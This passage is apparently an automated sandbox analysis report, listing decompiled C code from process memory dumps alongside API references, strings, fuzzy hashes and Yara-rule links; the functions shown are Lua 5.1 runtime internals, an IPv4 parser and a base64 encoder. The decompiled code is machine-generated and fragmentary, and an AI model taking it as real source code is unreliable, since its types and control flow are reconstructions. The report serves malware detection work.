											return _t41;
										} else {
											goto L30;
										}
									}
									goto L45;
								case 4:
									goto L31;
							}
						}
						goto L45;
					}
				}
			}

0x10014b41
0x10014b47
0x10014b4c
0x00000000
0x10014b50
0x00000000
0x10014b50
0x00000000
0x10014b50
0x10014b64
0x00000000
0x10014d3e
0x10014d44
0x00000000
0x00000000
0x10014c74
0x10014c76
0x10014d45
0x10014d48
0x10014d4a
0x10014d4f
0x10014d50
0x10014d50
0x10014d56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10014b6b
0x10014b70
0x10014c5c
0x10014c5e
0x10014c61
0x10014c63
0x00000000
0x00000000
0x10014c69
0x00000000
0x10014b76
0x10014b78
0x10014bd8
0x10014bdb
0x10014bdd
0x10014be2
0x10014be7
0x10014be8
0x10014bed
0x10014bed
0x10014bf2
0x10014bf9
0x10014bfc
0x10014bfe
0x10014c02
0x10014c0e
0x10014c04
0x10014c04
0x10014c04
0x10014c12
0x10014c12
0x10014c19
0x10014c1f
0x10014c20
0x10014c21
0x10014c26
0x10014c29
0x10014c2b
0x00000000
0x00000000
0x10014c33
0x10014c36
0x10014c37
0x10014c38
0x10014c3d
0x10014c40
0x10014c42
0x00000000
0x00000000
0x10014c48
0x00000000
0x10014b7a
0x10014b83
0x10014ba8
0x10014ba8
0x10014b85
0x10014b85
0x10014b8a
0x10014b8c
0x10014b8d
0x10014b93
0x10014b93
0x10014bad
0x00000000
0x10014bb3
0x10014bc0
0x10014bc2
0x10014bc7
0x10014d8f
0x10014d8f
0x00000000
0x10014d8f
0x10014bcd
0x00000000
0x10014bcd
0x10014bad
0x10014b78
0x00000000
0x00000000
0x10014cfe
0x10014cfe
0x10014d01
0x10014d04
0x10014d2c
0x10014d06
0x10014d06
0x10014d1a
0x10014d1a
0x00000000
0x00000000
0x10014d2d
0x10014d3d
0x00000000
0x00000000
0x00000000
0x00000000
0x10014b64
0x10014c7c
0x10014c83
0x10014c88
0x10014c8d
0x10014ca9
0x10014ca9
0x10014c8f
0x10014c96
0x10014c9b
0x10014ca0
0x00000000
0x10014ca2
0x10014ca2
0x10014ca2
0x10014ca0
0x10014caf
0x10014cb5
0x10014ceb
0x10014ced
0x00000000
0x00000000
0x10014cf3
0x10014cf4
0x00000000
0x10014cb7
0x10014cbf
0x00000000
0x10014d67
0x00000000
0x00000000
0x10014d68
0x10014d6a
0x00000000
0x00000000
0x10014d6d
0x10014d7d
0x00000000
0x00000000
0x10014d7e
0x10014d7f
0x10014d80
0x10014d81
0x10014d82
0x10014d87
0x10014d8e
0x00000000
0x00000000
0x10014cc6
0x10014cc8
0x10014ce3
0x10014ce3
0x00000000
0x10014cca
0x10014cd0
0x10014cd1
0x10014cd2
0x10014cd3
0x10014cd8
0x10014cdb
0x10014cdd
0x10014d95
0x00000000
0x00000000
0x00000000
0x10014cdd
0x00000000
0x00000000
0x00000000
0x00000000
0x10014cbf
0x00000000
0x10014cb5
0x10014b50

APIs

_isctype.MSVCRT ref: 10014B8D
luaL_error.LUA5.1(?,missing '[' after '%%f' in pattern), ref: 10014BE8

Strings

missing '[' after '%%f' in pattern, xrefs: 10014BE2

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error._isctype
String ID: missing '[' after '%%f' in pattern
API String ID: 2992898777-1831663757
Opcode ID: 2f5a257fe05d7ecc52b2f3b196f91e32a5278e3fc91bae5538ebea83e78f5d43
Instruction ID: ddacf325dd47b58493aaf29673f53c86b989d74cc0d79867b2c52b827aa2a8de
Opcode Fuzzy Hash: 2f5a257fe05d7ecc52b2f3b196f91e32a5278e3fc91bae5538ebea83e78f5d43
Instruction Fuzzy Hash: 57516FB760525256C710C625BC91ABBBBDDCFC21A6B0A04B5F955CF113EE36E89182F0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C1B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E1000C1B0(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t26;
				signed int _t28;
				void* _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t38;
				signed int _t39;
				signed int _t42;
				void* _t48;
				void* _t49;

				_t39 = _a12;
				if(_t39 != 0) {
					_t19 = E10008970(__ecx, _t39 - 1);
					_t37 = _a4;
					_t49 = _t48 + 4;
					_t28 = _t19 + 1;
					if(_t28 > 0x1a) {
						_push("table overflow");
						_push(_t37);
						E10004EA0();
						_t49 = _t49 + 8;
					}
					_t42 = 1 << _t28;
					_t8 = _t42 + 1; // 0x2
					if(_t8 > 0x7ffffff) {
						_t21 = E100088B0(_t37);
					} else {
						_t21 = E100088D0(_t37, 0, 0, 1 << 5);
					}
					_t35 = _a8;
					 *((intOrPtr*)(_t35 + 0x10)) = _t21;
					if(_t42 > 0) {
						_t32 = 0;
						_t38 = _t42;
						do {
							_t23 =  *((intOrPtr*)(_t35 + 0x10));
							 *((intOrPtr*)(_t23 + _t32 + 0x1c)) = 0;
							_t24 = _t23 + _t32;
							_t32 = _t32 + 0x20;
							_t38 = _t38 - 1;
							 *((intOrPtr*)(_t24 + 0x18)) = 0;
							 *((intOrPtr*)(_t24 + 8)) = 0;
						} while (_t38 != 0);
					}
					_t22 =  *((intOrPtr*)(_t35 + 0x10));
					 *(_t35 + 7) = _t28;
					 *((intOrPtr*)(_t35 + 0x14)) = (_t42 << 5) + _t22;
					return _t22;
				} else {
					_t36 = _a8;
					 *((intOrPtr*)(_t36 + 0x10)) = 0x10017468;
					_t26 =  *((intOrPtr*)(_t36 + 0x10));
					 *((intOrPtr*)(_t36 + 0x14)) = (_t39 << 5) + _t26;
					 *((char*)(_t36 + 7)) = 0;
					return _t26;
				}
			}

0x1000c1b3
0x1000c1bc
0x1000c1e0
0x1000c1e5
0x1000c1eb
0x1000c1ee
0x1000c1f2
0x1000c1f4
0x1000c1f9
0x1000c1fa
0x1000c1ff
0x1000c1ff
0x1000c209
0x1000c20b
0x1000c213
0x1000c229
0x1000c215
0x1000c21e
0x1000c223
0x1000c231
0x1000c237
0x1000c23a
0x1000c23c
0x1000c23e
0x1000c240
0x1000c240
0x1000c243
0x1000c247
0x1000c249
0x1000c24c
0x1000c24d
0x1000c250
0x1000c250
0x1000c240
0x1000c255
0x1000c25e
0x1000c261
0x1000c267
0x1000c1be
0x1000c1be
0x1000c1c7
0x1000c1ce
0x1000c1d4
0x1000c1d8
0x1000c1dd
0x1000c1dd

APIs

luaM_realloc_.LUA5.1(?,00000000,00000000,00000001,?,00000000,?,?,?,?,0000000F,?,?,00000002,?,?), ref: 1000C21E

Strings

table overflow, xrefs: 1000C1F4

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.
String ID: table overflow
API String ID: 3188633865-4099509905
Opcode ID: 28e56f87e0aa8bc017ed0a733989c682e6922d7ac4ab8037551c090224349856
Instruction ID: e1c7011d421de4e48aa3a02c8ac3545bcb30e337f3ccea302ce827ac6737016c
Opcode Fuzzy Hash: 28e56f87e0aa8bc017ed0a733989c682e6922d7ac4ab8037551c090224349856
Instruction Fuzzy Hash: 1211C3B2D0022A4BE308CF58D88185BFBA8FB452E4756066EE4149B747D632FD8587D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CBA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000CBA0(void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _t21;
				intOrPtr _t24;
				intOrPtr _t45;
				intOrPtr* _t46;
				void* _t48;
				void* _t49;
				void* _t58;

				_t46 = _a4;
				_t45 = E100062A0( *_t46);
				_t49 = _t48 + 4;
				_t21 =  *((intOrPtr*)( *_t46 + 8));
				 *_t21 = _t45;
				 *((intOrPtr*)(_t21 + 8)) = 9;
				_t22 =  *_t46;
				if( *((intOrPtr*)( *_t46 + 0x1c)) -  *((intOrPtr*)( *_t46 + 8)) <= 0x10) {
					E10005280(_t22, 1);
					_t49 = _t49 + 8;
				}
				 *((intOrPtr*)( *_t46 + 8)) =  *((intOrPtr*)( *_t46 + 8)) + 0x10;
				_t24 = E1000CD30(_t46);
				 *((intOrPtr*)(_t45 + 0x20)) = _t24;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t45 + 0x20)) = _a8;
				}
				 *((intOrPtr*)(_t45 + 0x3c)) = E1000CCF0(_t46);
				 *((intOrPtr*)(_t45 + 0x40)) = E1000CCF0(_t46);
				 *((char*)(_t45 + 0x48)) = E1000CCA0(_t46);
				 *((char*)(_t45 + 0x49)) = E1000CCA0(_t46);
				 *((char*)(_t45 + 0x4a)) = E1000CCA0(_t46);
				 *((char*)(_t45 + 0x4b)) = E1000CCA0(_t46);
				E1000CD80(_t46, _t45);
				_push(_t45);
				_push(_t46);
				E1000CDE0(_t58);
				_push(_t45);
				_push(_t46);
				E1000CF80();
				if(E10004500(_t45) == 0) {
					E1000CC70(_t46, "bad code");
				}
				 *((intOrPtr*)( *_t46 + 8)) =  *((intOrPtr*)( *_t46 + 8)) + 0xfffffff0;
				return _t45;
			}

0x1000cba1
0x1000cbb0
0x1000cbb2
0x1000cbb5
0x1000cbb8
0x1000cbba
0x1000cbc1
0x1000cbce
0x1000cbd3
0x1000cbd8
0x1000cbd8
0x1000cbde
0x1000cbe2
0x1000cbea
0x1000cbef
0x1000cbf5
0x1000cbf5
0x1000cbff
0x1000cc08
0x1000cc11
0x1000cc1a
0x1000cc23
0x1000cc2d
0x1000cc30
0x1000cc35
0x1000cc36
0x1000cc37
0x1000cc3c
0x1000cc3d
0x1000cc3e
0x1000cc4e
0x1000cc56
0x1000cc5b
0x1000cc66
0x1000cc6d

APIs

luaF_newproto.LUA5.1(00000000,?,?,1000CB93,00000000,00000000,?,1001993C,00000002,?), ref: 1000CBA9

Part of subcall function 100062A0: luaM_realloc_.LUA5.1(?,00000000,00000000,0000004C), ref: 100062AE

luaD_growstack.LUA5.1(?,00000001), ref: 1000CBD3

Strings

bad code, xrefs: 1000CC50

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: D_growstack.F_newproto.M_realloc_.
String ID: bad code
API String ID: 2501599383-3738743346
Opcode ID: 8bcb897ad9e69e181f4f638200d680ea9dddbc8d12cab5cf0d02253d9867620f
Instruction ID: eb0202550fd063fa77665b7e79eddc7d1a6c8a9b7e1a0bf1130befeb07ddf487
Opcode Fuzzy Hash: 8bcb897ad9e69e181f4f638200d680ea9dddbc8d12cab5cf0d02253d9867620f
Instruction Fuzzy Hash: BC21B0789017556FE310CB7DCC46D4ABBE8EF46284704042AF448E7307EB75F8058BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00991980, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00991980(char* _a4, intOrPtr* _a8) {
				char _v4;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				intOrPtr _t23;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				char* _t39;
				intOrPtr* _t40;

				_t39 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0;
				if(sscanf(_t39, "%u.%u.%u.%u%n",  &_v16,  &_v12,  &_v8,  &_v4,  &_v20) == 0) {
					L10:
					return 0;
				} else {
					_t23 = _v20;
					if(_t23 == 0 ||  *((intOrPtr*)(_t23 + _t39)) != 0) {
						goto L10;
					} else {
						_t24 = _v16;
						if(_t24 > 0xff) {
							goto L10;
						} else {
							_t38 = _v12;
							if(_t38 > 0xff) {
								goto L10;
							} else {
								_t37 = _v8;
								if(_t37 > 0xff) {
									goto L10;
								} else {
									_t35 = _v4;
									if(_t35 > 0xff) {
										goto L10;
									} else {
										_t40 = _a8;
										if(_t40 != 0) {
											_t31 = (((_t24 << 8) + _t38 << 8) + _t37 << 8) + _t35;
											_push(_t31);
											L00994A34();
											 *_t40 = _t31;
										}
										return 1;
									}
								}
							}
						}
					}
				}
			}

0x00991985
0x009919ab
0x009919af
0x009919b3
0x009919b7
0x009919bb
0x009919ca
0x00991a35
0x00991a3b
0x009919cc
0x009919cc
0x009919d2
0x00000000
0x009919d9
0x009919d9
0x009919e2
0x00000000
0x009919e4
0x009919e4
0x009919ee
0x00000000
0x009919f0
0x009919f0
0x009919fa
0x00000000
0x009919fc
0x009919fc
0x00991a06
0x00000000
0x00991a08
0x00991a08
0x00991a0e
0x00991a1d
0x00991a1f
0x00991a20
0x00991a25
0x00991a25
0x00991a32
0x00991a32
0x00991a06
0x009919fa
0x009919ee
0x009919e2
0x009919d2

APIs

sscanf.MSVCRT ref: 009919BF
htonl.WSOCK32(?), ref: 00991A20

Strings

%u.%u.%u.%u%n, xrefs: 009919A5

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: htonlsscanf
String ID: %u.%u.%u.%u%n
API String ID: 2020779984-154050584
Opcode ID: 29cc6953e17cdd10d22419a59cbfcfc69e2b455105ecd70b6aa7ff6a18a7eef8
Instruction ID: 80afbf713fd223c6788a9dfc4dd575a45b748b78d37bb6182387eaac3c1748d8
Opcode Fuzzy Hash: 29cc6953e17cdd10d22419a59cbfcfc69e2b455105ecd70b6aa7ff6a18a7eef8
Instruction Fuzzy Hash: B6115EB2A0E2035BDB10DE58C880A9BB7E9FFC4350F98493DF585C3141D274DD4A8BA2

Uniqueness

Uniqueness Score: -1.00%

Function 009C13B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E009C13B0(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v1;
				char _v2;
				char _v3;
				char _v4;
				void* _t24;

				_v4 = 0x3d;
				_v3 = 0x3d;
				_v2 = 0x3d;
				_v1 = 0x3d;
				_t24 = _a8 - 1;
				if(_t24 == 0) {
					_push(4);
					_v3 =  *((intOrPtr*)(0x2d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
					_push( &_v4);
					_push(_a12);
					_v4 =  *((intOrPtr*)((0 << 4 >> 6) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
					L009C2144();
					goto L4;
				} else {
					if(_t24 != 1) {
						L4:
						return 0;
					} else {
						_push(4);
						_v2 =  *((intOrPtr*)(0x2d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
						_v3 =  *((intOrPtr*)(0x2d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
						_push( &_v4);
						_push(_a12);
						_v4 =  *((intOrPtr*)((0 << 2 >> 6 >> 6) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
						L009C2144();
						return 0;
					}
				}
			}

0x009c13b3
0x009c13b7
0x009c13bb
0x009c13bf
0x009c13c7
0x009c13c8
0x009c142d
0x009c144c
0x009c1454
0x009c1455
0x009c1456
0x009c145a
0x00000000
0x009c13ca
0x009c13cb
0x009c1462
0x009c1465
0x009c13d1
0x009c13d7
0x009c13f6
0x009c1409
0x009c1415
0x009c1416
0x009c1417
0x009c141b
0x009c1426
0x009c1426
0x009c13cb

APIs

luaL_addlstring.LUA5.1(?,?,00000004,?,009C128B,?,00000000,?), ref: 009C141B
luaL_addlstring.LUA5.1(?,?,00000004,?,009C128B,?,00000000,?), ref: 009C145A

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 009C13EB, 009C13FD, 009C1403, 009C143C, 009C1446

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addlstring.
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
API String ID: 2501753795-1713319389
Opcode ID: 4e017ab92a0cadbbe76b980bcd02bf4a46ee160ffed69dc3d014bdd710c498b1
Instruction ID: 5a508bb4c9e539ee880e9d1862637504e6e5f363fb78c9306f1429e71200a28d
Opcode Fuzzy Hash: 4e017ab92a0cadbbe76b980bcd02bf4a46ee160ffed69dc3d014bdd710c498b1
Instruction Fuzzy Hash: 9F118B5261D3C1AED309DB6884119ABBFE18AEB200F1CC99DF5C98B303E034C90AD723

Uniqueness

Uniqueness Score: -1.00%

Function 009C19D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E009C19D0(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _t16;
				intOrPtr* _t23;
				void* _t24;
				intOrPtr _t25;
				void* _t26;

				_t25 = _a8;
				_t24 = 0;
				if(_t25 <= 0) {
					L10:
					return 0;
				}
				_t23 = _a12;
				_t16 = _a4;
				do {
					_t9 =  *(_t24 + _t16);
					_t5 = ( *(_t24 + _t16) & 0x000000ff) + 0x9c41c0; // 0x1010101
					if( *_t5 != 0) {
						E009C1950(_t9, _t23);
						_t26 = _t26 + 8;
					} else {
						_t6 = _t23 + 0x20c; // 0x20c
						if( *_t23 >= _t6) {
							_push(_t23);
							L009C210E();
							_t26 = _t26 + 4;
						}
						 *((char*)( *_t23)) =  *(_t24 + _t16);
						 *_t23 =  *_t23 + 1;
					}
					_t24 = _t24 + 1;
				} while (_t24 < _t25);
				if(_t25 > 0) {
					_push("=");
					_push(_t23);
					L009C2114();
				}
				goto L10;
			}

0x009c19d1
0x009c19d6
0x009c19db
0x009c1a42
0x009c1a45
0x009c1a45
0x009c19dd
0x009c19e2
0x009c19e6
0x009c19e6
0x009c19f1
0x009c19f9
0x009c1a20
0x009c1a25
0x009c19fb
0x009c19fd
0x009c1a05
0x009c1a07
0x009c1a08
0x009c1a0d
0x009c1a0d
0x009c1a15
0x009c1a1a
0x009c1a1a
0x009c1a28
0x009c1a29
0x009c1a30
0x009c1a32
0x009c1a37
0x009c1a38
0x009c1a3d
0x00000000

APIs

luaL_prepbuffer.LUA5.1(00000000,00000000,00000000,00000000,?,009C17D8,?,00000000,?), ref: 009C1A08
luaL_addstring.LUA5.1(00000000,=,?), ref: 009C1A38

Strings

=, xrefs: 009C1A32

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addstring.L_prepbuffer.
String ID: =
API String ID: 989049566-2257139842
Opcode ID: d18b7f3d5b587777d20721525a307e40ecc31c3cc668dd0a2536497dd2a469cd
Instruction ID: fbd7d439cdba598bef05b9bee317cf9083f30a91468cdfac1b5d7827ccd12b6a
Opcode Fuzzy Hash: d18b7f3d5b587777d20721525a307e40ecc31c3cc668dd0a2536497dd2a469cd
Instruction Fuzzy Hash: 23017B31E093425BC311DF54A890FA7BBA8EFA7340B28041CE9C593303E322A816C7B7

Uniqueness

Uniqueness Score: -1.00%

Function 10007620, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007620(intOrPtr _a4, char _a8) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t33;
				intOrPtr* _t35;
				void* _t36;

				_t24 = _a4;
				_t35 =  *((intOrPtr*)(_a4 + 0x3c));
				_t16 =  *((intOrPtr*)(_t35 + 8));
				if( *((intOrPtr*)(_t35 + 4)) + 1 > _t16) {
					_t40 = _t16 - 0x7ffffffe;
					if(_t16 >= 0x7ffffffe) {
						E10007560(_t40, _t24, "lexical element too long", 0);
						_t36 = _t36 + 0xc;
					}
					_t20 =  *((intOrPtr*)(_t35 + 8));
					_t33 =  *((intOrPtr*)(_t35 + 8)) +  *((intOrPtr*)(_t35 + 8));
					_t7 = _t33 + 1; // 0x1
					if(_t7 > 0xfffffffd) {
						_t21 = E100088B0( *((intOrPtr*)(_t24 + 0x34)));
					} else {
						_t21 = E100088D0( *((intOrPtr*)(_t24 + 0x34)),  *_t35, _t20, _t33);
					}
					 *((intOrPtr*)(_t35 + 8)) = _t33;
					 *_t35 = _t21;
				}
				 *((char*)( *((intOrPtr*)(_t35 + 4)) +  *_t35)) = _a8;
				_t19 =  *((intOrPtr*)(_t35 + 4)) + 1;
				 *((intOrPtr*)(_t35 + 4)) = _t19;
				return _t19;
			}

0x10007621
0x10007626
0x1000762c
0x10007632
0x10007634
0x10007639
0x10007643
0x10007648
0x10007648
0x1000764b
0x1000764f
0x10007652
0x10007658
0x10007671
0x1000765a
0x10007663
0x10007668
0x10007679
0x1000767c
0x1000767e
0x10007688
0x1000768e
0x1000768f
0x10007694

APIs

luaM_realloc_.LUA5.1(?,?,?,00000000,00000000,?,00000000,100075FF,?,00000000,?,100075AF,?,?), ref: 10007663
luaM_toobig.LUA5.1(?,00000000,?,00000000,100075FF,?,00000000,?,100075AF,?,?), ref: 10007671

Strings

lexical element too long, xrefs: 1000763D

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.M_toobig.
String ID: lexical element too long
API String ID: 1500966413-2211481722
Opcode ID: 0fdd3acc8e9552ae593bfdbfaaefcf6af881351f5db8c5b199c33dc9a9d50cb2
Instruction ID: a64d94777a3fb231be14ea0ee7d1044f15f71529d3cc61b79fd5a3ec6f1b47d6
Opcode Fuzzy Hash: 0fdd3acc8e9552ae593bfdbfaaefcf6af881351f5db8c5b199c33dc9a9d50cb2
Instruction Fuzzy Hash: 6E0192B9604B019FE724CF28D8C0C46B7E9FF996507108A4DE9AA8739AD731F840CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000D1B0(signed int __ecx, intOrPtr _a4, intOrPtr* _a8) {
				char _v32;
				signed int _t14;
				void* _t20;
				intOrPtr* _t23;

				_t14 = __ecx;
				_t23 = _a8;
				if( *((intOrPtr*)(_t23 + 8)) == 3) {
					 *((long long*)( &_v32 - 8)) =  *_t23;
					sprintf( &_v32, "%.14g", _t20);
					asm("repne scasb");
					 *_t23 = E1000BB00(_a4,  &_v32,  !(_t14 | 0xffffffff) - 1);
					 *((intOrPtr*)(_t23 + 8)) = 4;
					return 1;
				} else {
					return 0;
				}
			}

0x1000d1b0
0x1000d1b4
0x1000d1bc
0x1000d1cf
0x1000d1d8
0x1000d1eb
0x1000d1ff
0x1000d201
0x1000d212
0x1000d1be
0x1000d1c4
0x1000d1c4

APIs

sprintf.MSVCRT ref: 1000D1D8
luaS_newlstr.LUA5.1(?,?,?,?,1000D97C,?,?,00000001,?,?,?,00000002,?,?,?), ref: 1000D1F7

Strings

%.14g, xrefs: 1000D1D2

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.sprintf
String ID: %.14g
API String ID: 3483616938-3267037135
Opcode ID: b7f0746b69dc39c67ad82dfb76160247b26b59b1a91bddec414257c297a87485
Instruction ID: 2030cfe5979dcaa70cee576e1ceb7cdc2e3b47b3405cb7bc8523b5a1518ef6c1
Opcode Fuzzy Hash: b7f0746b69dc39c67ad82dfb76160247b26b59b1a91bddec414257c297a87485
Instruction Fuzzy Hash: ACF0F076410200AFE314EF69CC85AABB7F4EF88300F808A1DF4E592194E670E588CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10004F40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

luaS_newlstr.LUA5.1(?,not enough memory,00000011,10005036,?,?,?,?,?,?), ref: 10004F6E

Strings

error in error handling, xrefs: 10004F68
not enough memory, xrefs: 10004F5F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.
String ID: error in error handling$not enough memory
API String ID: 2716169249-1496530364
Opcode ID: 6b620e55b3ada0f4fa314da9f47ec17a3eb0204bc5fb1aff4dfe7f3f53da39d0
Instruction ID: a1e4107c3046c4e8b512e2d413ee08323b8fdd7f985e473f43963a74a6efa17e
Opcode Fuzzy Hash: 6b620e55b3ada0f4fa314da9f47ec17a3eb0204bc5fb1aff4dfe7f3f53da39d0
Instruction Fuzzy Hash: 4AF08CB6604712AFD300CF19E884A8AF7E0EB85360B16896DF69897395C370E8818B85

Uniqueness

Uniqueness Score: -1.00%

Function 00991200, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00991200(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				intOrPtr _t10;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t14;

				_t10 = _a8;
				_t14 = _a4;
				_t12 = _a12;
				_t13 = E00991330(_t14, _t10, _t12);
				if(_t13 == 0) {
					sprintf( &_v48, "%.35s expected", _t10);
					_push( &_v48);
					_push(_t12);
					_push(_t14);
					L00994B2A();
				}
				return _t13;
			}

0x00991204
0x00991209
0x0099120f
0x0099121b
0x00991222
0x0099122f
0x00991239
0x0099123a
0x0099123b
0x0099123c
0x00991241
0x0099124d

APIs

Part of subcall function 00991330: luaL_checkudata.LUA5.1(?,?,?,0099121B,?,?,?), ref: 0099133F

sprintf.MSVCRT ref: 0099122F
luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

Strings

%.35s expected, xrefs: 00991229

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
